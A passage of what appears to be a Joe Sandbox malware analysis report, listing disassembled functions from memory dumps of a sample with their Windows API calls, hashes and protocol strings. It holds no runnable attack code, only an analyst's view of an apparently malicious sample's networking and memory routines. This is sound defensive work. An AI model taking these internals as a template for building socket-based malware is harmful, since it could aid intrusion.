                                                                                                                                                                      • Instruction Fuzzy Hash: F5217176640704ABC734EF79EC89BA7B3E8FF89710F500A1EF58AC7640D671A4058BA1
                                                                                                                                                                      Function 03774E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 03774E99
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 03774EB8
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 03774EC2
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 03774ED9
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03774EE2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03774EE9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: 88ad2089f5007b3280815993eaf664839b8f60cc5b8cba5b107f32b5f1dcf664
                                                                                                                                                                      • Instruction ID: a7f6e5c3639b8298f473e2834d37c9984e1d991d243f88c98e2d3c874429f2dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 88ad2089f5007b3280815993eaf664839b8f60cc5b8cba5b107f32b5f1dcf664
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F1186327043089BD720FB7AEC8497BF3ECEB48621B044A3FE615C6540D675D805C7A5
                                                                                                                                                                      Function 02C64E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 02C64E79
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 02C64E98
                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 02C64EA2
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C64EB9
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C64EC2
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C64EC9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                      • Opcode ID: 0481b69c58d2de962900202faf02d1b42ccf0c17215dcb7f42667e495bf4c2bf
                                                                                                                                                                      • Instruction ID: 7f6580741440063767b40a0ef4fdc99e32bf3b9407bad15462d51072201b3057
                                                                                                                                                                      • Opcode Fuzzy Hash: 0481b69c58d2de962900202faf02d1b42ccf0c17215dcb7f42667e495bf4c2bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 66118632B003048BC330EAB9ED88A7BF3DCFB88755B400A2AEA05C6540D771D915C7E5
                                                                                                                                                                      Function 0377DD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377DD32
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377DE35
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: Main
                                                                                                                                                                      • API String ID: 1452528299-521822810
                                                                                                                                                                      • Opcode ID: 04a28698699c7d97deffc97c57b53933fe184db208c6a9681a96fdbcb8c978d9
                                                                                                                                                                      • Instruction ID: 5624ee4ec61e1ca59b17bd462c85d925a7e65d375f34949a7a46706dd1cf5a63
                                                                                                                                                                      • Opcode Fuzzy Hash: 04a28698699c7d97deffc97c57b53933fe184db208c6a9681a96fdbcb8c978d9
                                                                                                                                                                      • Instruction Fuzzy Hash: 5441A171A40209EFEB20DF58DC81B6AB3F8FF54314F0846AAD8459B251E7B5E941CB90
                                                                                                                                                                      Function 03773F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03773F65
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03773648), ref: 03774054
                                                                                                                                                                        • Part of subcall function 03772BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03772BD6
                                                                                                                                                                        • Part of subcall function 03772BC0: SwitchToThread.KERNEL32 ref: 03772BEA
                                                                                                                                                                      • send.WS2_32(?,037949C0,00000010,00000000), ref: 03773FC6
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03773FE9
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03773FF5
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 03774003
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 0377401B
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03774025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                      • Opcode ID: 0e02a102b45d3d8103dbdc05ae6d186ecafb3e15f43ad859370aec8fe836a8e8
                                                                                                                                                                      • Instruction ID: 07ee20810ae2ab2c93f7ad757ccbe333ebb1426244ce86726313d0e286411138
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e02a102b45d3d8103dbdc05ae6d186ecafb3e15f43ad859370aec8fe836a8e8
                                                                                                                                                                      • Instruction Fuzzy Hash: BA215C75200704ABE730EF79D888B5BB7F9BB48710F144E1DE2928B681C7B9E446CB90
                                                                                                                                                                      Function 02C63F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C63F65
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,74DEDFA0,02C63648), ref: 02C64054
                                                                                                                                                                        • Part of subcall function 02C62B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C62B96
                                                                                                                                                                        • Part of subcall function 02C62B80: SwitchToThread.KERNEL32 ref: 02C62BAA
                                                                                                                                                                      • send.WS2_32(?,02C77440,00000010,00000000), ref: 02C63FC6
                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C63FE9
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C63FF5
                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 02C64003
                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 02C6401B
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C64025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                      • Opcode ID: f1d3a3f21080fd4a6a3c334decf28615ba8c85a8f5bd0551005cd3701b096b94
                                                                                                                                                                      • Instruction ID: b536db48aef87d35455d95536a23889c6e5c9e71886ca235ecab07e02770ed40
                                                                                                                                                                      • Opcode Fuzzy Hash: f1d3a3f21080fd4a6a3c334decf28615ba8c85a8f5bd0551005cd3701b096b94
                                                                                                                                                                      • Instruction Fuzzy Hash: 37214B716407109BD3349F64D88CB6BB7B5FF84B55F500E1CE68287680C7B6E455CB90
                                                                                                                                                                      Function 03774060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774074
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774087
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774090
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774099
                                                                                                                                                                        • Part of subcall function 03771350: HeapFree.KERNEL32(?,00000000,?,?,?,037740A6,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03771390
                                                                                                                                                                        • Part of subcall function 03771420: HeapFree.KERNEL32(?,00000000,?,?,?,037740B1,?,00000000,03774039,?,74DEDFA0,03773648), ref: 0377143D
                                                                                                                                                                        • Part of subcall function 03771420: _free.LIBCMT ref: 03771459
                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 037740B9
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 037740D4
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774150
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,03774039,?,74DEDFA0,03773648), ref: 03774157
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                      • Opcode ID: afb51c404a6c7a9ff428cfd036de9e0888f62b50008f75e87dbe5dcdc3e2d513
                                                                                                                                                                      • Instruction ID: 95383f88b7c2db9dcc1b3d166af389e288922cb222db069abc0d61cd43b6dc69
                                                                                                                                                                      • Opcode Fuzzy Hash: afb51c404a6c7a9ff428cfd036de9e0888f62b50008f75e87dbe5dcdc3e2d513
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F312874200A06AFDB09EB39D858B96F7A8FF48310F15865AE4298B250DB35A951CFD0
                                                                                                                                                                      Function 02C64060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64074
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64087
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64090
                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64099
                                                                                                                                                                        • Part of subcall function 02C61350: HeapFree.KERNEL32(?,00000000,?,?,?,02C640A6,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C61390
                                                                                                                                                                        • Part of subcall function 02C61420: HeapFree.KERNEL32(?,00000000,?,?,?,02C640B1,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C6143D
                                                                                                                                                                        • Part of subcall function 02C61420: _free.LIBCMT ref: 02C61459
                                                                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C640B9
                                                                                                                                                                      • HeapCreate.KERNEL32(?,?,?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C640D4
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64150
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,02C64039,?,74DEDFA0,02C63648), ref: 02C64157
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1219087420-0
                                                                                                                                                                      • Opcode ID: 48df6446c44b0efe0932163c603bc4830a41f3eab86cd9feea68fb266de9168b
                                                                                                                                                                      • Instruction ID: 00238e3cae3413f8db32d441f21d704fdd253f8d0945c10c90e4fdb60f206e26
                                                                                                                                                                      • Opcode Fuzzy Hash: 48df6446c44b0efe0932163c603bc4830a41f3eab86cd9feea68fb266de9168b
                                                                                                                                                                      • Instruction Fuzzy Hash: 08313270600A02EFD719DF38C898BA6F7A9FF48314F048659E829C7250CB35A865DFE0
                                                                                                                                                                      Function 035FB62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_malloc
                                                                                                                                                                      • String ID: ($6$gfff$gfff
                                                                                                                                                                      • API String ID: 3506388080-713438465
                                                                                                                                                                      • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                      • Instruction ID: 331c29e54ce41b48a2782cad8a74fde6f5137732ad6923dfe5a0df80ce6448c7
                                                                                                                                                                      • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                                                                                                      • Instruction Fuzzy Hash: D2D17EB1D01318EFDB14EFE5ED85AAEBBB9FF48300F104529E505AB251D770A905CBA1
                                                                                                                                                                      Function 03772140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03771610: __vswprintf.LIBCMT ref: 03771646
                                                                                                                                                                      • _malloc.LIBCMT ref: 03772330
                                                                                                                                                                        • Part of subcall function 0377F673: __FF_MSGBANNER.LIBCMT ref: 0377F68C
                                                                                                                                                                        • Part of subcall function 0377F673: __NMSG_WRITE.LIBCMT ref: 0377F693
                                                                                                                                                                        • Part of subcall function 0377F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F6B8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                      • Opcode ID: c147293662df851cf4bc9efac12f6fd17b0b235767dbedb2bf4d057d0f30ea3d
                                                                                                                                                                      • Instruction ID: 8bc6541bf586638d3912fb44fee4b428480803a98c07f0502e983c164744e646
                                                                                                                                                                      • Opcode Fuzzy Hash: c147293662df851cf4bc9efac12f6fd17b0b235767dbedb2bf4d057d0f30ea3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 90B1A275A002058FCF18DF68D8846AAB7B5BF48310F184ABEDD699B347DB31D941CB90
                                                                                                                                                                      Function 02C62140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C61610: __vswprintf.LIBCMT ref: 02C61646
                                                                                                                                                                      • _malloc.LIBCMT ref: 02C62330
                                                                                                                                                                        • Part of subcall function 02C66E83: __FF_MSGBANNER.LIBCMT ref: 02C66E9C
                                                                                                                                                                        • Part of subcall function 02C66E83: __NMSG_WRITE.LIBCMT ref: 02C66EA3
                                                                                                                                                                        • Part of subcall function 02C66E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66EC8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                                                                      • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                                                                      • API String ID: 3723585974-868042568
                                                                                                                                                                      • Opcode ID: a1ed18bb6bf2ace4a9a1db2cb34c74722b5b1233dc9ea4b3da99d39427f30eef
                                                                                                                                                                      • Instruction ID: 61f360d82c3d4369fa54d562027359d6f12391506cb2d85ba7f8c39b885bda82
                                                                                                                                                                      • Opcode Fuzzy Hash: a1ed18bb6bf2ace4a9a1db2cb34c74722b5b1233dc9ea4b3da99d39427f30eef
                                                                                                                                                                      • Instruction Fuzzy Hash: 51B1AF75A002058BCF18CF69C8C86BA7BA6FF84314F0846BEDD499B346D771DA45CB92
                                                                                                                                                                      Function 03771830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 03771878
                                                                                                                                                                      • _free.LIBCMT ref: 037718B6
                                                                                                                                                                      • _free.LIBCMT ref: 037718F5
                                                                                                                                                                      • _free.LIBCMT ref: 03771935
                                                                                                                                                                      • _free.LIBCMT ref: 0377195D
                                                                                                                                                                      • _free.LIBCMT ref: 03771981
                                                                                                                                                                      • _free.LIBCMT ref: 037719B9
                                                                                                                                                                        • Part of subcall function 0377F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76), ref: 0377F64F
                                                                                                                                                                        • Part of subcall function 0377F639: GetLastError.KERNEL32(00000000,?,03783E4C,00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000), ref: 0377F661
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 06586830e64b33b7d4aa8dc10a299d73e2e0036fedba189d929af3703125b820
                                                                                                                                                                      • Instruction ID: 1b4bbf19141e1184340ee1441d5d7d35489773cc01b72de9b03f499eedb6daba
                                                                                                                                                                      • Opcode Fuzzy Hash: 06586830e64b33b7d4aa8dc10a299d73e2e0036fedba189d929af3703125b820
                                                                                                                                                                      • Instruction Fuzzy Hash: 84514DB6A00211CFDB14DF58C184965BBB6FF89214B6980BDD50A9F321D732AD42CF91
                                                                                                                                                                      Function 02C61830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 02C61878
                                                                                                                                                                      • _free.LIBCMT ref: 02C618B6
                                                                                                                                                                      • _free.LIBCMT ref: 02C618F5
                                                                                                                                                                      • _free.LIBCMT ref: 02C61935
                                                                                                                                                                      • _free.LIBCMT ref: 02C6195D
                                                                                                                                                                      • _free.LIBCMT ref: 02C61981
                                                                                                                                                                      • _free.LIBCMT ref: 02C619B9
                                                                                                                                                                        • Part of subcall function 02C66E49: HeapFree.KERNEL32(00000000,00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F), ref: 02C66E5F
                                                                                                                                                                        • Part of subcall function 02C66E49: GetLastError.KERNEL32(00000000,?,02C69900,00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000), ref: 02C66E71
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ecd2d68ca2cf95cc2344cb4762ca5cb7522a901389cc8024da71331bc0440b97
                                                                                                                                                                      • Instruction ID: 9127faf11660656e2b80ca6128182fadcb0c3040b9eb6de92a5a2c29f2c73c14
                                                                                                                                                                      • Opcode Fuzzy Hash: ecd2d68ca2cf95cc2344cb4762ca5cb7522a901389cc8024da71331bc0440b97
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D514D72A00210CFD714DF59C5C8969BBA6BF8931972E81ADC50EAF311C772AE52CF91
                                                                                                                                                                      Function 03773870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03773883
                                                                                                                                                                      • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 037738C4
                                                                                                                                                                      • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03773931
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377395C
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 037739F4
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03773A22
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03773A39
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058130114-0
                                                                                                                                                                      • Opcode ID: 27f0bc4b4147f3daaab859d2f9508a4a4f382c87182947d0d0d6d91ea91df48e
